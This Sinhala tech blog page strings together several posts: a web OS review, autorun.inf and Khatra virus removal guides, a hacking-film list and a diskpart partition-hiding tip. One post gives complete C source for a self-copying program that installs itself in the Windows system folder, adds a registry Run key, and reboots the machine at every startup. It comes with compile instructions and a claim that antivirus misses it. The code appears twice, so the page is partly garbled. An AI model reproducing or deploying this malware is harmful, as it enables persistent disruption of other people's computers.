
අද ලියන්න හදන්නෙ වයිරස් එකක් හදන හැටිවත්, වයිරස් එකක් අයින් කරන හැටිවත් ගැන නෙමෙයි, ජංජාලෙ සැරිසරමින් ඉන්නකොට දැකපු දෙයක් ගැනයි. ඇත්තටම කියනවනම්, මේක OS එකක්. OS එකක් කියුවට නිකම්ම OS එකක් නෙමේ. මේ OS එක ක්‍රියත්මක වෙන්නෙ Web Browser එකක් උඩයි. මේකෙ නම ඇවිල්ලා, Icloud. මේ Web Browser base ගැන අපිට මුලින්ම අහන්න ලැබුනෙ Google OS වලින්. නමුත් ඉතින් ඒක එන්නෙ ලබන අවුරුද්දෙනෙ. මේ එක නිපද්වල තියෙන්නෙ Xcerion AB සමාගමෙනුයි. Sweden රටට අයත් සමාගමක්. AJAX-based තාක්ෂණයක් තමයි මෙතනදි ඒ ගොල්ලො බාවිතා කරල තියෙන්නෙ. මෙතනදි OS එකක තියන හැම වැඩසටහනක්ම අපිට බාවිතා කරන්න පුලුවන්. අනිත් එක තමයි අපිට ඔන්ලයින් 3GB online storage එකකුත් ලැබෙනව. ලස්සන Interface එකකුත් තියනව.
හැබැයි දැනට තියන ලෙකුම අවුල තමයි. මේක හරියට ක්‍රියත්මක වෙන්නෙ, MS Internet explorer වල විතරයි. Firefox වලට තාම යන්නෙ Alpha version එකක්. මටනම් දැනෙන විදියට ලොකු සාර්ථකත්වයක් Icloud OS එකේ තියනව. නමුත් වෙලාවකට හිතෙනව, OS එකක් ඇතුලෙ තවත් OS එකක් run වෙන එකෙන් ලැබෙන වාසිය මොකද්ද කියල. මේකත් අයිති වෙන්නෙ FOSS පැත්තට නිසා කස්ටිය කැමති වෙයි කියල හිතනව.
ඔන්න මමත් වැඩේ අත්හදා බැලුව. Screen Print ටිකකුත් ගත්තා.
- මුලින්ම ට්‍රයි කෙරුවෙ, Firefox එකේ
- මේක තමයි Console එක.

- Firefox එකේ browser එක හරියටම වැඩ කෙරුවෙ නෑ. ඒක හින්ද IE එකට මාරුවක් දාල බැලුව. ආහ් නියමෙට වැඩ


10
ඇදහස්

අපි අද බලමු ගොඩක් අයට වදයක් වෙන Autorun.inf කියන වයිරස් එකට වැඩක් දෙන හැටි. මේක මම දන්න විදියට දැනට ගොඩක් පරිග්ණක වලට ආසාදනය වෙල තියනව. ගොඩක් අයට මේක ඩිලීට් කරන විදිය දන්නෙ නෑ. මොකද මේක වයිරස් ගාර්ඩ් වලිනුත් හරිහැටි අයින් කරන්නෙ නැති හින්දා!
මේකට ගොඩක් ක්‍රම භාවිතා කෙරුවත් මම ලේසිම ක්‍රමය කියල දෙන්නම්.
- Notepad එකක් අරගෙන පහතින් දැක්වෙන කොඩ්ස් ටික notepad එකට පේස්ට් කරන්න.
c:
attrib -r -s -h autorun.inf
del autorun.inf
d:
attrib -r -s -h autorun.inf
del autorun.inf
e:
attrib -r -s -h autorun.inf
del autorun.inf
f:
attrib -r -s -h autorun.inf
del autorun.inf
g:
attrib -r -s -h autorun.inf
del autorun.inf
h:
attrib -r -s -h autorun.inf
del autorun.inf
i:
attrib -r -s -h autorun.inf
del autorun.inf
j:
attrib -r -s -h autorun.inf
del autorun.inf
k:
attrib -r -s -h autorun.inf
del autorun.inf
l:
attrib -r -s -h autorun.inf
del autorun.inf
m:
attrib -r -s -h autorun.inf
del autorun.inf
n:
attrib -r -s -h autorun.inf
del autorun.inf
o:
attrib -r -s -h autorun.inf
del autorun.inf
p:
attrib -r -s -h autorun.inf
del autorun.inf
q:
attrib -r -s -h autorun.inf
del autorun.inf
r:
attrib -r -s -h autorun.inf
del autorun.inf
s:
attrib -r -s -h autorun.inf
del autorun.inf
- "file.bat" විදියට Notepad file එක Save කර ගන්න.
- file.bat කියන අපි හදාගත්ත file එක run කරන්න.
වැඩේ එච්චරයි.
---*--- ලිපියෙ අවුලක් වගේ දෙයක් තිබුනෙත් නොපමාව අහන්න.---*---
වයිරස් විසඳුම් -1 කොටස ( Khatra.exe | gHost.exe | Xplorer.exe වයිරස් වලට ටටා කීම)
තේරීම
වයිරස් විසඳුම්,
වැඩ කෑලි

ඔන්න වැඩි දෙනෙකුගෙ ඉල්ලීම පරිදි දැනට බහුලව දකින්නට ලැබෙන පරිගණක වයිරස් කොහොමද හරි ආකාරයෙන් නැත්තටම නැති කරල දාන්නෙ කියල, කියලා දෙන්නයි යන්නෙ.
ඒ ලිපි පෙලේ මුල්ම ලිපියයි මේ.
හරි අද අපි බලමු, Khatra.exe කියන වයිරස් එකට කොහොමද මතක හිටින වැඩක් දෙන්නෙ කියලා.
ඇත්තටම මේක මට ගොඩක් වද දුන්න වයිරස් එකක් (පරිගණකයෙන් එච්චර වැඩ දාන්න බැරි කාලේ). දැන්නම් ඉතින් මොන වයිරස් එකක් ආවත් බෙහෙත් තියනව.
- මුලින්ම Task manager මෙනු එකට යන්න.(Task manager එකත් වයිරස් වලින් බ්ලොක් කරලනම් ඒකටත් පිලියම් ඉදිරි ලිපි වලින් බලාපොරොත්තු වන්න). process tab එකට ගිහිල්ලා regsvr.exe(process tab ඒකේ තිබුනොත් පමනයි), gHost.exe, khatra.exe සහ Xplorer.exe, right click කරලා 'end process tree' කියන මෙනුව තොරන්න.
- Start Menu --> Run --> cmd එකට ගිහිල්ලා,
- Everything search engine කියන මෘදුකන්ගය බාගත කර ගන්න. (Everything search engine කියන්නෙ පරිගණකගෙ තියන හැම ෆයිල් එකක්ම පෙන්නන, දැනට වින්ඩෝස් එක්ක හොඳටම වැඩ කරන මෘදුකාන්ගයක්.
- Everything search engine එක Run කරලා , regsvr.exe, gHost.exe, khatra.exe සහ Xplorer.exe කියන exe ෆයිල්ස් එකින් එක ඩිලීට් කරල දාන්න.
- start menu --> run --> regedit කියන මෙනුවට යන්න (registry editing එකත් වයිරස් වලින් බ්ලොක් කරලනම් ඒකටත් පිලියමක් ඉදිරි ලිපි වලින් කියල දෙන්නම්.) Ctrl+F වලින් khatra,gHost,Xplorer කියන registry keys ටික හොයල ඩිලීට් කරල දාන්න.
- වැඩේ එච්චරයි. මෙතනදි ඔයාට සැක හිතෙන ඕනෙම ෆයිල් එකක් මේ විදියටම පරිගනකයෙන් අයින් කරන්න පුලුවන්.ඒකට Everything search engine කියන මෘදුකාන්ගය ගොඩක් උපකාරී වෙයි.මොකද ගොඩක් වෙලාවට Virus Gard වලින් හරිආකාරයෙන් වයිරස් ඩිලීට් වීමක් සිදුවන්නෙ නෑ. සමහර වෙලාවට මේ වයිරස්, Virus Gard එකෙන් අදුනා ගන්නෙත් නෑ.
folder option අක්‍රීය වීම, Regedit අක්‍රීය වීම, task manager අක්‍රීය වීම වැනි දේවල් නැවතත් ක්‍රියාත්මක කරගන්න හැටි පොස්ට් එකක් දාන්න ඕනෙ නෑ. මොකද මම දැක්කා අපේ සිංහල බ්ලොග් සන්ගමේ කසුන්ගෙ බ්ලොග් එකේ මේකට හොඳ විසඩුමක් දීල තියනව.
ඕනෙ අය ඉන්නවනම් කසුන්ගෙ බ්ලොග් එකට ගිහින් වැඩි විස්තර ලබා ගන්න පුලුවන්.

අද මම පෙන්නන්න යන්නෙ පොඩි වයිරස් එකක් හදන විදිය. හැබැයි මේක කියල දෙන්න ඉස්සෙල්ලාම කියන්න තියෙන්නෙ, මේක අනිත් අයට හරදරයක් වෙන විදියට කරන්න එපා කියලයි. මේකෙ තියන තාක්ෂණික පැත්ත ඉගෙන ගන්න. හරි, වයිරස් එකෙන් කෙරෙන්නෙ මේකයි, පරිගණකය බූට් කරන හැම වාරයක් පාසාම පරිගණකය රී-ස්ටාර්ට් වෙනවා. මේකෙ තියන හොඳම දේ කියන්නෙ මේ වැඩසටහන දැනට තියන කිසිම ඇන්ටි-වයිරස් මෘදුකාන්ගයකට හසු නොවීමයි. මම මේක කෝඩින් කරල තියෙන්නෙ C වලින්. ඉතින් C වලට ටිකක් හුරු අයට මේක අල්ල ගන්න ලේසියි. නමුත් අනිත් අයටත් අවුලක් වෙන්නෙ නෑ. ප්‍රශ්න ආවොත් අහන්න.
- මෙන්න මේකටි කෝඩින් එක.
#include
#include
#include
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
#include
#include
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
- "Turbo C compiler" වගේ compiler එකක් මගින් මේක .exe file එකක් බවට පරිවර්තනය කරගන්න.
- හරි, දැන් බලමු මේක හරියට ක්රයත්මක වෙනවද කියල බලන්නෙ කොහොමද කියල! අපි මුලින් compile කර ගන හදා ගත්ත sysres.exe file, එක double click කරන්න. වැඩේ හරියට කෙරුවනම්, මෙතැන් පටන් අපි පරිගණකය බූට් කරන හැම වාරයක් පාසාම පරිගණකය රී-බූට් වෙනව.
- දැන් අපි බලමු, මේ වයිරස් එක පරිගණකයෙන් ඉවත් කරන්නෙ කොහොමද කියලා.
1. මුලින්ම පරිගණකය බූට් වෙනකොට Safe Mood එකෙන් බූට කරන්න.
2. X:\Windows\System (X can be C,D,E or F). කියන ෆොල්ඩරය හොයා ගන්න.
3. ෆොල්ඩරය ඇතුලෙ තියන sysres.exe කියන ෆයිල් එක හොයාගෙන ඒක ඩ්ලීට් (delete) කරල දාන්න.
4. Run menu (win key + R) එකට ගිහිල regedit කියල ටය්ප් කරන්න.
5. HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run විදියට navigate කරන්න.
6. දකුනු පැත්තෙ තියන "sres" කියන entry එක ඩිලීට් කරන්න.
----*----- ඔන්න දැන් වයිරස් එක සහමුලින්ම අයින් කරල දැම්මා ----*-----
- හරි, දැන් මම කියල දෙන්නම් මේ ක්‍රියාවලියෙ පසුපස තියන නියාය මොකක්ද කියලා !
- මුලින්ම අපි exe file එක run කෙරුවාම වයිරස් එක පරිගණකය බූට් වෙන windows Root partition එක හොයා ගන්නව.
- ඊටපස්සෙ ඒක determine කරනව වයිරස් එක X:\Windows\System කියන ෆොල්ඩර් එකට කොපි වෙලාද කියල!
- කොපි වෙලා නැත්තන් එයා කොපි කරගෙන රෙජිස්ට්‍රි (registry entry) එකක් හදා ගන්නව මේක startup එකේදි පන ගැන්වෙන විදියට.
- නැත්තන් X:\Windows\System ඩිරෙක්ටරියෙ වයිරස් එක කොපි වෙල තියනවනම්. එය රී-බූට් වෙන්න කමාන්ඩ් එකක් දෙනවා. මේ ක්‍රියාවලිය නොකඩව සිදුවෙනව.
- මේක බලන අයට නැවතත් කරුනාවෙන් කියන්නෙ. තමන්ගෙ පරිගණකයෙ අත්හදා බැලුවට, අනිත් අයට ගේමක් දෙන්ඩ හිතාගෙනනම් කරන්න එපා. අනිත් එක, registry key ගැන හරි අවබෝදයක් නැත්තම් මේක අත්හදාබැලීමෙන් වැලකී සිටීම නුවනට හුරුයි. නැත්තන් මට එන්න වෙයි මේක අයින් කරල දෙන්න.
-----*---- අපහැදිලි තැනක් තියනවනම් අහන්න. -----*----
- ඔෆිස් එකේ වැඩ ඔක්කොම පැත්තකින් දාල මේක ටයිප් කරල ඇගිලිත් රිදෙනව.
---- ** -- ඉදිරියේදි වයිරස් එකකින් USB එකක් අක්ක්රය කරන්නෙ කොහොමද කියල කියල දෙන්නම්. ---- ** --

අද මාර කම්මැලි දවසක්, office එකේ පරන වෙවී තිබ්බ වැඩ ටිකත් ඔක්කොම ඉවර කෙරුවා. ජංජාලෙත් රවුමක් දැම්මා. කම්මැලි කමත් යන්ඩ කියල අද මම කියනම් දැනට ලොකේ හැකින් (hacking) සහ පරිගණක තාක්ෂණය පිලිබඳව නිපැවුනු හොඳම චිත්ත්‍රපටි ටිකක් ගැන.
මම මෙහෙම එකක් දාන්න හිතුවෙ, දැන් අපිට හම්බෙන්නෙ ගොඩක් මෑත කාලීනව නිපැවුනු චිත්‍රපටි නිසායි. මෙතනදි මම 1983 ඉඳල චිත්‍රපටි ඇතුලත් කරල තියනව. වෙලාවක් ලැබුනොත් බාගෙන බලන්න.
1. Sneakers (1992) -

ටිකක් විතර පරනයි. නමුත් හොඳටම රසවිදින්න පුලුවන් ෆිල්ම් එකක්,
2. Live Free or Die Hard (2007)

මේකනම් ඉතින් මෑත කාලීනව ආපු එකක් නිසා ගොඩක් අය බලල ඇති
3. War Games (1983)

මේ මූවි එක මම ඉපදෙන්ඩත් ඉස්සෙල්ලා ගහපු එකක්. එදා කාලෙ මේ ෆිල්ම් එක ගහල තියෙන්නෙ අදට එනම් 2005 වගෙ වෙන දෙයක් තේමා කරගෙන. මේ ෆිල්ම එකෙන් තමයි මුලින්ම හැකින් (Hacking) වලින් කොතරම් විනාශයක් කල හැකිද කියල ලෝකෙට දැනෙන්න සලස්වල තියෙන්නෙ. ඒ වගේම nuclear weapons ගැනත් මේ ෆිල්ම් එකෙන් පෙන්නල තියනව.
4. Untraceable (2008)

මේකනම් මම බලපු ගොඩක් රසවත් චිත්‍රපටියක්. කතාව වෙන්නෙ, FBI එකේ ඉන්න නිලධාරිනියකට පැවරෙනව අන්තර්ජාලයේ කරන අමුතුම ජාතියෙ අපරාදයක් ගැන හොයන්න. මේක අසාමාන්‍ය විදියට කෙරෙන අපරදයක්. අපරාදය මොකද්ද කියල කියන්නෑ. එතකොට අගය නැති වෙන නිසා.
5. Takedown (2000)

මේකනම් ඕගොල්ලො ඔක්කොමල්ලම බලන්න ඕනෙ ෆිල්ම් එකක්. මෙ ෆිල්ම එක සත්‍ය සිදුවීමක් පාදක කරගෙන හදපු 'Kevin Mitnick' කියන හැකර් වටා තනපු ෆිල්ම එකක්.මේය එසේ මෙසේ හැකර් කෙනෙක් නෙමෙයි. FBI එකත් හැක් කරපු එක්කෙනෙක්. වැඩිවිස්තර ඕනෙනම්, විකිපීඩියා පැත්තෙ රවුමක් දාන්ඩ.
මෙන්න මේවයි එයා කරලා තියන හපන්කම් :-
Confirmed criminal acts
6. Hackers (1995)
මේකෙ ඉන්නෙ අපි කවුරුත් අදුනන සුරූපි නිලියක් වන Angeline Jolie , ඇයට පරිගණකයේ ඕනෙම geek එකක් විසඳන්න කරන්න පුලුවන්.
7. Antitrust (2001)
8. Swordfish (2001)
9. The Net (1995)
10. Eagle Eye (2008)
මෙතනදි මම සඳහන් කෙරුවෙ 'English movies' විතරයි. මොකද මම සාමාන්යෙන් නරබන්නේ ඉංග්‍රීස් මූවීස් විතරක් වීම. දන්න අය ඉන්නවනම් අනිත් භාෂා වලින් හොඳ ෆිල්ම්ස් ටිකකුත් දාන්න.
- Using the Los Angeles bus transfer system to get free rides[3]
- Evading the FBI[4]
- Hacking into DEC system(s) to view VMS source code (DEC reportedly spent $160,000 in cleanup costs)[3][4]
- Gaining full admin privileges to an IBM minicomputer at the Computer Learning Center in LA in order to win a bet[3]
- Hacking Motorola, NEC, Nokia, Sun Microsystems and Fujitsu Siemens systems[4]
6. Hackers (1995)
මේකෙ ඉන්නෙ අපි කවුරුත් අදුනන සුරූපි නිලියක් වන Angeline Jolie , ඇයට පරිගණකයේ ඕනෙම geek එකක් විසඳන්න කරන්න පුලුවන්.
- වෙලාවක් සෙට් වුනෙත් මේවත් බලන්න
7. Antitrust (2001)
8. Swordfish (2001)
9. The Net (1995)
10. Eagle Eye (2008)
මෙතනදි මම සඳහන් කෙරුවෙ 'English movies' විතරයි. මොකද මම සාමාන්යෙන් නරබන්නේ ඉංග්‍රීස් මූවීස් විතරක් වීම. දන්න අය ඉන්නවනම් අනිත් භාෂා වලින් හොඳ ෆිල්ම්ස් ටිකකුත් දාන්න.

ඊයෙ මදුරුවො එලවන හැටි ගැන ලියපු පොස්ට් එකට සෑහෙන හොඳ ප්‍රතිචාර තිබුනා. හැබැයි දැනගන්ඩ ලැබුනු විදියටනම්, වැඩේ එච්චර සාර්තක නෑ වගේ. මටනම් ඕක අත්හදා බලන්ඩ බැරිවුනා., මොකද මම ඉන්න රටේ මදුරුවො නැති හින්දා.
හරි ඔන්න අද කියල දෙන්නෙ පොඩි හොර වැඩක් කරන හැටි. හොර වැඩක් කියුවට ඉතින් හොර වැඩක්ම නෙමෙයි. වැඩේ මේකයි. ඔයගෙ ගෙදර තියන PC එක පාවිච්ච් කරන්නෙ ඔය විතරක් නෙමෙයිනම් මේක ගොඩක් ප්‍රයොජනවත් වෙයි.අනිත් අයට පේන්නෙ නැති විදියට ඔයගෙ පුද්ගලික ලිපි ගොනු අයත් HDD partition එක හන්ගන ක්‍රමයක් ගැනයි කියන්නෙ. මේක ලොකු වැඩක් නෙමෙයි. මෙන්න මෙහෙමයි කරන්නෙ,
- මුලින්ම win key+R වලින් Run මෙනුවට ගිහිල්ලා Diskpart කියන විදානය දෙන්න.
- කමාන්ඩ එක හරියට දුන්නනම් දැන් CMD එකේ DISKPART> විදියට පෙන්නුම් කර යුතු වෙනව.ඊට පස්සෙ List Volume කියන විදානය දෙන්න.
- හරි දැන් දැකගන්ඩ පුලුවන් වෙයි පරිගණකයේ HDD partition වල විස්තරයක්. ඒකෙන් තමන්ට හන්ගන්ඩ අවශ්‍ය එක තොරා ගන්ඩ. ගොඩක් දුරට මේකට අන්තිමට තියන ලෙටර් එක පවිච්චි කරනවනම් හොඳයි. මොකද එතකොට කාටවත් වැඩේ ගැන සැක කරන්න බෑ. ඊට පස්සෙ 'select volume 4 remove letter D' විදියට කමාන්ඩ එක දෙන්න D partition එක hide කරීමට. මේකෙදි පරිගණ්කයේ ලෙටර් එක අනුව වෙනස් වීම කරන්න.
- වැඩේ හරියට කෙරුවනම් දැන් ගිහිල්ලා බලන්ඩ My computer එකට, ඔයාට තේරෙයි D drive එක අතුරුදහන් වෙලා කියල. මේක නැවතත් යතා තත්වයට ගැනීමටනම් "select volume 4 assign letter D" විදියට විදානය දෙන්න.
Subscribe to:
Posts (Atom)



